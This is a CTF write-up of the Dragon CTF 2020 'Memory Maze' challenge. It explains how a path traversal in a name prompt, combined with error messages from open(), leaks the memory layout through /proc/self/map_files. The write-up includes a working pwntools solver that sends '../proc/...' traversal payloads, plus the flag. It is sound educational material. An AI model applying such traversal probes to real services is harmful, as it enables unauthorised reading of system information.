Rating: 5.0
## Overview
The challenge description goes as follows:
```
Miscellaneous, 287 pts
Difficulty: medium (26 solvers)
Can you escape my memory maze? Treasure awaits at the end!
nc memorymaze.hackable.software 1337
Download File
```
[Download archive here](https://w0y.at/data/ctf/dragonctf2020/memmaze/memmaze.tar.gz)
Well, let's see if we are able to find the treasure!
## A look at the treasure map!
We can find several files in the challenge archive
+ **main.c**: Entrypoint for the program
+ **maze.c** & **maze.h**: The implementation of the maze
+ **Makefile**: To build everything ;)
+ **run.sh**: runs the binary with nsjail
First, let's dig through the provided sources to see what we can do here.
On startup, the program will first initialize a maze and tell us it's size and address
```cpp
#define SIZE 303ul
#define MAX_SOL_SIZE (SIZE * SIZE)
#define BASE_ADDR ((char*)0x13370000ul)
static int g_rand_fd;
//... Cut some things here
static unsigned int get_rand_uint(void) {
unsigned int c = 0;
if (read(g_rand_fd, &c, sizeof(c)) != sizeof(c)) {
err(1, "read");
}
return c;
}
int main(void) {
inits();
struct maze* m = gen_maze(SIZE, get_rand_uint);
if (!m) {
errx(1, "gen_maze");
}
if (map_maze(m, BASE_ADDR)) {
errx(1, "map_maze");
}
printf("Maze size: %zu\n", m->size);
printf("Maze address: %p\n", m->addr);
```
Then it will ask us for our name, use this as a file and check if it is writable inside `/tmp`. If not, we have to provide another username.
```cpp
char path[0x200];
int solution_fd;
do {
char name[0x100] = { 0 };
puts("Your name:");
recv_line(name, sizeof(name));
if (name[0] == '\0') {
puts("Goodbye!");
return 1;
}
printf("Hello %s!\n", name);
if (snprintf(path, sizeof(path), "/tmp/%s", name) < 0) {
err(1, "snprintf");
}
solution_fd = open(path, O_WRONLY | O_CREAT, S_IRWXU);
if (solution_fd < 0) {
printf("Path \"%s\" is invalid: %m\n", path);
}
} while (solution_fd < 0);
```
The *CTF connoisseur* will quickly spot the path traversal vulnerability here: sending `../somename` as name would lead to `/tmp/../somename` being accessed.
So, our first thought was, ok, we could potentially write to files outside of `/tmp`. At this point we had no idea of what to do with this, so we moved on.
Next, we have to provide a solution (the max size is set to `MAZE_SIZE*MAZE_SIZE`, so we could walk every cell once...) which will be checked for invalid characters and afterwards written to the file created with our username.
```cpp
printf("Solution size (max %zu):\n", MAX_SOL_SIZE);
size_t size = 0;
if (scanf("%zu", &size) != 1) {
err(1, "scanf");
}
if (!size || size > MAX_SOL_SIZE) {
errx(1, "bad solution size");
}
char* solution = calloc(size + 1, sizeof(*solution));
if (!solution) {
err(1, "malloc");
}
puts("Solution:");
if (scanf(" ") < 0) {
err(1, "scanf");
}
size_t i = 0;
do {
char c = 0;
if (fread(&c, sizeof(c), 1, stdin) != 1) {
err(1, "fread");
}
switch (c) {
case 'N':
case 'S':
case 'E':
case 'W':
break;
default:
errx(1, "invalid character: %c", c);
}
solution[i] = c;
++i;
} while (i < size);
write_all(solution_fd, solution, size);
```
Finally the solution will be evaluated, and if it is valid, we will get the flag.
```cpp
if (solve_maze(m, solution)) {
errx(1, "solution is not correct");
}
int flag_fd = open("flag.txt", O_RDONLY);
if (flag_fd < 0) {
err(1, "flag open");
}
char flag[0x100] = { 0 };
if (read(flag_fd, flag, sizeof(flag)) < 0) {
err(1, "read flag");
}
printf("CONGRATULATIONS: %s\n", flag);
return 0;
}
```
To win this, solve_maze has to return `1`. Ok, so what does *solve_maze* actually do? We can find it in *maze.c*:
```cpp
int solve_maze(struct maze* maze, char* solution) {
size_t x = 1;
size_t y = 1;
while (*solution) {
switch (*solution) {
case 'N':
--y;
break;
case 'S':
++y;
break;
case 'E':
++x;
break;
case 'W':
--x;
break;
default:
x = 0;
y = 0;
break;
}
++solution;
char* ptr = maze->addr;
*(volatile char*)ptr = 'X';
}
if (x == maze->size - 2 && y == maze->size - 2) {
return 0;
}
return 1;
}
```
The solver evaluates the solution as follows:
1. We start at `(1,1)`
2. We need to get to `(maze->size-2, maze->size-2)`
3. For each step of the solution, the program will try to write to a memory location, which is dependent on the current position in the maze. So, for a valid solution, all of the addresses need to be actually writable.
At this point it might be useful to inspect how the maze is actually generated. :)
## The maze awaits!
After memory allocation for the maze, with a size of 303x303, the path through the maze is generated as follows:
```cpp
// maze.c:26ff
size_t i, j;
for (i = 1; i < size - 1; ++i) {
if (i % 2 == 0) {
maze->maze[i * size + (i % 4 == 0 ? 1 : size - 2)] = 1;
unsigned int b = get_rand_uint();
maze->maze[i * size + 1 + (b % (size - 2))] = 1;
} else {
for (j = 1; j < size - 1; ++j) {
maze->maze[i * size + j] = 1;
}
}
}
```
The algorithm goes through the rows in the maze and generates the following:
+ If the current row's index is 0 mod 2, then two things happen:
1. Depending on the index mod 4 it will alternatingly set column[1] or column[size-2] to `1`
2. It will generate a random index for the current column and set that to 1 as well.
+ Otherwise it will set every cell in `column[1:size-2]` to `1`
Afterwards it will map addresses which correspond to the index in the maze for every cell which is set to `1`:
```cpp
// maze.c:42ff
int map_maze(struct maze* maze, void* addr) {
maze->addr = addr;
size_t i, j;
for (i = 0; i < maze->size; ++i) {
for (j = 0; j < maze->size; ++j) {
if (!maze->maze[i * maze->size + j]) {
continue;
}
void* ptr = mmap(maze->addr + (i * maze->size + j) * PAGE_SIZE,
PAGE_SIZE,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED_NOREPLACE,
-1, 0);
if (ptr == MAP_FAILED) {
return 1;
}
}
}
return 0;
}
```
Since it might not be straight forward to understand let's look at an example for the maze:
![Random Maze](https://w0y.at/images/dragonctf2020/memmaze/maze.png)
In this maze, the walls are the grey, the free paths are the green part, and we need to go from the yellow point on the top left to the orange dot at the lower right.
Looking at the sample closely, one sees a path that is not relying on the randomly defined gates:
* start is at 1, 1
* go east until you reach the right wall - 300 steps
* go south until you reach the horizontal wall - 2 steps
* go west until you reach the left wall - 300 steps
* etc.
Let's try this. And really, if we generate the path like this and feed it to the binary `./main` directly we indeed retrieve the *dummy flag* from flag.txt. **YAY!**
But unfortunately not on the challenge host. :( On the remote host, things get weird when entering a path which is longer than ~ 25k steps. Assuming the binary running remotely is exactly the one shipped, there must be something that we are missing here. After inspecting the files again, we find the flaw in our approach. When testing the binary, we did neglect the nsjail, which is used to run the binary on the remote end.
```bash
#!/bin/sh
set -eu
PWD="`pwd`"
if swapon -s 2>&1 | grep -q '.'; then
echo "You should turn the swap off"
exit 1
fi
~/nsjail/nsjail -Q -Ml --port 1337 -R "$PWD/main:/main" \
-R "$PWD/flag.txt:/flag.txt" -R /dev/urandom -T /tmp \
--cgroup_mem_max 170000384 -- /main
```
So the behaviour we observed could be the result of restrictions enforced by nsjail.
According to the nsjail man page:
```
--cgroup_mem_max VALUE
Maximum number of bytes to use in the group (default: '0' - disabled)
```
To verify this we try running the binary locally with nsjail as well but remove the argument `--cgroup_mem_max 170000384`;
The exploit works. Adding the argument again, the exploit fails again. We seem to hit memory restrictions enforced, preventing us from going the full path to the end, damn. Would have been too easy.
**This means we need to find a shorter path through the maze!**
## Reading the map again...
There must really be something we missed here. We really tried hard to understand the map, but we dug ourselves some rabbit-holes on the way, which we went down hard.
+ Are there any files that would help us exploit the challenge we could write to with the path traversal?
+ Is there a flaw in the random path generation?
+ Is there a problem with the mappings?
After some hours of trial and error, to the best of our knowledge, the answer to above questions is **No**. So much for that...
Finally, we realised that the username was check in a loop? Why would this loop be there?
Further inspection of the loop revealed another very interesting aspect:
```cpp
solution_fd = open(path, O_WRONLY | O_CREAT, S_IRWXU);
if (solution_fd < 0) {
printf("Path \"%s\" is invalid: %m\n", path);
}
```
On failure to open the file for writing, the program would not just tell us that it could not open the file, but would also tell us exactly *WHY* it was not able to open the file (printf's `%m` modifier will print the error message).
This means we get different error messages depending on whether the file exist, but is not writable, or if the file does not exist but the underlying folder is not writable.
That was the hint that sent us looking in the right direction. How could we possibly leak information about the randomly generated path in the maze by accessing the filesystem?
## Digging out the treasure
As this is something that has to be process specific, we started by investigating the `proc` filesystem for a running instance of `main`. And indeed, the `/proc/<pid>/map_files` folder holds a file for every memory mapping done in this program.
The names are based on the start and end address of the mapped region and look like this:
```
...
18cb5000-18cb6000 1e65e000-1e65f000 23ed8000-23ed9000 29881000-29882000
18cb6000-18cb7000 1e65f000-1e660000 23ed9000-23eda000 29882000-29883000
18cb7000-18cb8000 1e660000-1e661000 23eda000-23edb000 29883000-29884000
18cb8000-18cb9000 1e661000-1e662000 23edb000-23edc000 29884000-29885000
18cb9000-18cba000 1e662000-1e663000 23edc000-23edd000 29885000-29886000
18cba000-18cbb000 1e663000-1e664000 23edd000-23ede000 29886000-29887000
18cbb000-18cbc000 1e664000-1e665000 23ede000-23edf000 29887000-29888000
18cbc000-18cbd000 1e665000-1e666000 23edf000-23ee0000 29888000-29889000
18cbd000-18cbe000 1e666000-1e667000 23ee0000-23ee1000 29889000-2988a000
...
```
The pattern is `<startaddr>-<endaddr>`. Great! We already know from the maze mapping algorithm, that it will create a mapping based on the index of the cell in the maze:
```cpp
void* ptr = mmap(maze->addr + (i * maze->size + j) * PAGE_SIZE,
PAGE_SIZE,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED_NOREPLACE,
-1, 0);
```
Specifically, it uses `maze->addr + (i * maze->size + j) * PAGE_SIZE` as base address and create the pages with a size of `PAGE_SIZE`, which is set to 0x1000. We also know maze->addr, which is set to `(char*)0x13370000ul)`.
With this information, we can generate all possible map files, and see if they exist in the file system or not. If a specific file exists, we know that this cell is mapped in the maze, and can be traversed.
As a short example, if we take a file with a name`18cb5000-18cb6000`, this would mean that the cell `[89][69]` can safely be *accessed* in the maze.
```python
i = int(((0x18cb5000 - 0x13370000) / 0x1000) / 256)
j = int(((0x18cb5000 - 0x13370000) / 0x1000) / 256)
i, j
(89, 69)
```
## Treasure Chest Party Quest!
Armed with this information it is only a matter of finding the traversable cells in the maze and then calculating a path through it. However, our initial (dump) approach of just iterating through all possible cells to leak the full maze did work against a local deployment, but it was way to slow to find a solution remotely. If we remember the maze from before, we already know that most of the path is always the same.
![Maze predictable](https://w0y.at/images/dragonctf2020/memmaze/maze_deterministic.png)
So all we need to find are the random holes that get punched through the walls.
Therefore we only need to look in every second row until we find a hole and then continue on. With this improvement, finding the maze becomes feasible on the remote end as well.
```python
MAZE_SIZE = 303
MAZE_BASE = 0x13370000
# Create the initial maze
maze = []
maze.append([1] * MAZE_SIZE)
for x in range(75):
maze.append([1] + [0]*(MAZE_SIZE-2) + [1])
maze.append([1] *(MAZE_SIZE-2) + [0] + [1])
maze.append([1] + [0] * (MAZE_SIZE-2) + [1])
maze.append([1] + [0] + [1] *(MAZE_SIZE-2))
maze.append([1] + [0]*(MAZE_SIZE-2) + [1])
maze.append([1] * MAZE_SIZE)
# Now let's leak the maze
p = remote('localhost', 1337)
#p = remote('memorymaze.hackable.software', 1337)
with log.progress('Leaking Maze') as logp:
for x in range(2,MAZE_SIZE,2):
logp.status(f"At row: {x}")
for y in range(2,MAZE_SIZE-1):
offset = x*MAZE_SIZE + y
p.readuntil('Your name:')
offset = MAZE_BASE + offset * 0x1000
p.sendline('../proc/self/map_files/{}-{}'.format( hex(offset)[2:],hex(offset+0x1000)[2:]))
p.readline()
p.readline()
data = p.readline()
if b'Operation not permitted' in data:
maze[x][y] = 0
break
log.success("We got the maze!")
```
After that we *only* have to find a valid path through the maze. We started by using `A*` to look for a path, but it took quite a while to return a path. Impatient as I am, I didn't want to wait that long for solutions during testing. :)
Since the path we need to find does not have to be the *optimal* solution, but just one that is *good enough* (read: shorter than ~25k steps), a simple recursive algorithm suffices to quickly find a path through the maze.
```python
start = (1, 1)
end = (MAZE_SIZE-2, MAZE_SIZE-2)
PATH_MAX = 25000
def mazerunner(rows, path = '', posx = 1):
# Return if the path is too long
if len(path) > PATH_MAX:
return None
# Finish the path in case we are in the last row already
if len(rows) < 2:
#calculate last steps
return path + 'E' * (end[1] - posx)
# Find the holes and sort them by distance to the current posistion
indices = sorted([ (i-posx, i) for i, x in enumerate(rows[0]) if x == 0 ], key=lambda ind: abs(ind[0]))
for ind in indices:
dist = ind[0]
path_next = path
# Go to the hole
if dist > 0:
path_next += 'E' * dist
else:
path_next += 'W' * abs(dist)
# Go through the hole in the wall
path_next += 'SS'
# Search for the next hole
path_found = mazerunner(rows[2:], path = path_next, posx = posx + dist)
# Return the path if we have a path that is "short enough"
if path_found and len(path_found) < PATH_MAX:
return path_found
with log.progress('Running through the Maze!') as plog:
path = mazerunner(maze[2:])
plog.success('YAY, we found the exit!')
```
This will provide us with the following path through the previously leaked maze.
![Maze Path](https://w0y.at/images/dragonctf2020/memmaze/maze_path.png)
Now all that's left is to enter a valid name (path to a *writable* file) and send our solution to the server to get the flag.
```python
p.readuntil('Your name:')
p.sendline('We_0wn_Y0u')
p.readuntil('Solution size (max 91809):')
p.sendline(str(len(path)))
p.readuntil('Solution:')
p.send(path)
print(p.readall())
```
If we run this we get:
```bash
$ ./solver.
[+] Opening connection to memorymaze.hackable.software on port 1337: Done
[+] Leaking Maze: Done
[+] We got the maze!
[+] Running through the Maze!: YAY, we found the exit!
[+] Receiving all data: Done (47B)
[*] Closed connection to memorymaze.hackable.software port 1337
b"\nCONGRATULATIONS:DrgnS{Y0u_h4v3_f0unD_y0uR_w4y}\n"
```
So the final flag was **DrgnS{Y0u_h4v3_f0unD_y0uR_w4y}**!
The full solution (including the parts to print the maze_images from above) can be found [here](https://w0y.at/data/ctf/dragonctf2020/memmaze/mazerunner.py).
---
# Annex
If you want to try it out yourself, you need to get nsjail up and running. Here is how to do it on an Ubuntu 20.04.1 LTS:
1. Install build deps:
```
# apt-get install build-essential autoconf autotools-dev automake pkg-config m4 flex bison libprotobuf-dev protobuf-compiler libnl-3-dev libnl-genl-3-dev libnl-route-3-dev
```
2. Clone nsjail in /home
```
$ cd .
$ git clone https://github.com/google/nsjail
```
3. Build nsjail
```
$ cd nsjail
$ git checkout tags/3.0 -b 3.0
$ make
```
4. Create missing sys dir
```
# mkdir -p /sys/fs/cgroup/memory/NSJAIL
```